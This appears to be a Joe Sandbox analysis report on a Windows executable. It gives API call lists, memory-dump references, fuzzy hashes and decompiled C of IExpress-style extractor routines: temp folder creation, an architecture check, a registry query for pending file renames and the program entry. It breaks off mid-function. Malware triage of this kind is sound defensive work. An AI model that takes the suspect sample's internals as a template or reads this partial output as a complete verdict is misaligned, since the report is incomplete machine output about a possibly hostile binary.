                                                                                                                                                                                                        0x0021455a
                                                                                                                                                                                                        0x0021455a
                                                                                                                                                                                                        0x0021455a
                                                                                                                                                                                                        0x00214525
                                                                                                                                                                                                        0x0021468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 002145A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 002145E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 0021460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00214630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,photo660,00000000), ref: 00214666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0021466F
                                                                                                                                                                                                          • Part of subcall function 0021681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0021686E
                                                                                                                                                                                                          • Part of subcall function 0021681F: GetSystemMetrics.USER32(0000004A), ref: 002168A7
                                                                                                                                                                                                          • Part of subcall function 0021681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002168CC
                                                                                                                                                                                                          • Part of subcall function 0021681F: RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,?,0000000C), ref: 002168F4
                                                                                                                                                                                                          • Part of subcall function 0021681F: RegCloseKey.ADVAPI32(?), ref: 00216902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$photo660
                                                                                                                                                                                                        • API String ID: 3244514340-1652614573
                                                                                                                                                                                                        • Opcode ID: fb2715635dfd91dcf57ee255b8d5fd3ffa72c9ee15a0b029c5c12dca596125fd
                                                                                                                                                                                                        • Instruction ID: 2aac61020d8b47d141f2a4b5808637fe0b50128d5664242a0135f71d91124b06
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb2715635dfd91dcf57ee255b8d5fd3ffa72c9ee15a0b029c5c12dca596125fd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1851147191021AABDB21AF289C48BEA7BE9EF65304F004194FD0DA7241DB319EA5CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E002153A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E0021171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E00211680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E0021658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E00216CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0x218a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021171E: _vsnprintf.MSVCRT ref: 00211750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002153FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-4044985724
                                                                                                                                                                                                        • Opcode ID: 4cbe196dd5802cdb9a00131d7f61ac9abf2a5d25e612cd8856800ef8d5c3a93b
                                                                                                                                                                                                        • Instruction ID: dcc11fe3ce8c23d87c4a7f29d380b462e93cdf4889235ca1874e5908f4f25400
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cbe196dd5802cdb9a00131d7f61ac9abf2a5d25e612cd8856800ef8d5c3a93b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51113471711524A7D3209F22AC4CFEF36ADEFF6321F004065F656D2190CE7489E28AA2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00215467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0x2191e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00211680(0x2191e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E002158C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0x219124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E00216CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E0021597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0x218a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0x218a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0x219124 = E00216285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x218a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E002153A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0x2191e4;
                                                                                                                                                                                                        				E00211781(0x2191e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0x219a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E0021658A(_t48, 0x104, 0x211140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E0021658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002154C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021556F
                                                                                                                                                                                                          • Part of subcall function 002153A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002153FB
                                                                                                                                                                                                          • Part of subcall function 002153A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215402
                                                                                                                                                                                                          • Part of subcall function 002153A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021541F
                                                                                                                                                                                                          • Part of subcall function 002153A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021542B
                                                                                                                                                                                                          • Part of subcall function 002153A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-3963195772
                                                                                                                                                                                                        • Opcode ID: b7695c1cfe828577a6c9df15e914f26981c2deb54c8b9238c7df990ed12db3db
                                                                                                                                                                                                        • Instruction ID: 10ed915f59c5d7d0656a0365ffb134573bf215d1f9199ebbb77d6eddddd266e1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7695c1cfe828577a6c9df15e914f26981c2deb54c8b9238c7df990ed12db3db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D312870730A25FBCB109F29AC486FE76DBAFF1740B5441BAA905C2144DF748EF18A81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 21256d-21257d 564 212583-212589 563->564 565 212622-212627 call 2124e0 563->565 566 2125e8-212607 RegOpenKeyExA 564->566 567 21258b 564->567 571 212629-21262f 565->571 572 2125e3-2125e6 566->572 573 212609-212620 RegQueryInfoKeyA 566->573 570 212591-212595 567->570 567->571 570->571 574 21259b-2125ba RegOpenKeyExA 570->574 572->571 575 2125d1-2125dd RegCloseKey 573->575 574->572 576 2125bc-2125cb RegQueryValueExA 574->576 575->572 576->575
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E0021256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E002124E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00214096,00214096,?,00211ED3,00000001,00000000,?,?,00214137,?), ref: 002125B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00214096,?,00211ED3,00000001,00000000,?,?,00214137,?,00214096), ref: 002125CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00211ED3,00000001,00000000,?,?,00214137,?,00214096), ref: 002125DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00214096,00214096,?,00211ED3,00000001,00000000,?,?,00214137,?), ref: 002125FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00214096,00000000,00000000,00000000,00000000,?,00211ED3,00000001,00000000), ref: 0021261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 002125A8
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 002125F5
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 002125C3
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 21546b3e2abcb2cb04dfcd07d86f9921494ae1afd4d531a92c1806bf8b413e89
                                                                                                                                                                                                        • Instruction ID: c7cec7a07dd608680322f96d5e6e89352a8a330e404ec72c9a69903bf675b49c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21546b3e2abcb2cb04dfcd07d86f9921494ae1afd4d531a92c1806bf8b413e89
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B118235922229FB9B209B919C4DDFBBEBCDF257A1F504055F808A2041DA704FA8D6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 577 216a60-216a91 call 217155 call 217208 GetStartupInfoW 583 216a93-216aa2 577->583 584 216aa4-216aa6 583->584 585 216abc-216abe 583->585 586 216aa8-216aad 584->586 587 216aaf-216aba Sleep 584->587 588 216abf-216ac5 585->588 586->588 587->583 589 216ad1-216ad7 588->589 590 216ac7-216acf _amsg_exit 588->590 591 216b05 589->591 592 216ad9-216ae9 call 216c3f 589->592 593 216b0b-216b11 590->593 591->593 597 216aee-216af2 592->597 595 216b13-216b24 _initterm 593->595 596 216b2e-216b30 593->596 595->596 598 216b32-216b39 596->598 599 216b3b-216b42 596->599 597->593 600 216af4-216b00 597->600 598->599 601 216b44-216b51 call 217060 599->601 602 216b67-216b71 599->602 604 216c39-216c3e call 21724d 600->604 601->602 614 216b53-216b65 601->614 603 216b74-216b79 602->603 606 216bc5-216bc8 603->606 607 216b7b-216b7d 603->607 610 216bd6-216be3 _ismbblead 606->610 611 216bca-216bd3 606->611 612 216b94-216b98 607->612 613 216b7f-216b81 607->613 616 216be5-216be6 610->616 617 216be9-216bed 610->617 611->610 619 216ba0-216ba2 612->619 620 216b9a-216b9e 612->620 613->606 618 216b83-216b85 613->618 614->602 616->617 617->603 621 216c1e-216c25 617->621 618->612 622 216b87-216b8a 618->622 623 216ba3-216bbc call 212bfb 619->623 620->623 626 216c32 621->626 627 216c27-216c2d _cexit 621->627 622->612 625 216b8c-216b92 622->625 623->621 630 216bbe-216bbf exit 623->630 625->618 626->604 627->626 630->606
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00217155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0x2172b8);
                                                                                                                                                                                                        				E00217208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0x2188b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0x2188b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0x2181e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0x2188b0 = _t58;
                                                                                                                                                                                                        							_t37 = E00216C3F(0x2110b8, 0x2110c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L00216FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0x2188b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0x2110b4);
                                                                                                                                                                                                        							_push(0x2110ac);
                                                                                                                                                                                                        							L00217202();
                                                                                                                                                                                                        							 *0x2188b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0x2188ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0x2188b4;
                                                                                                                                                                                                        						if( *0x2188b4 != 0 && E00217060(_t71, 0x2188b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0x2188b4; // 0x0
                                                                                                                                                                                                        							 *0x21a288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
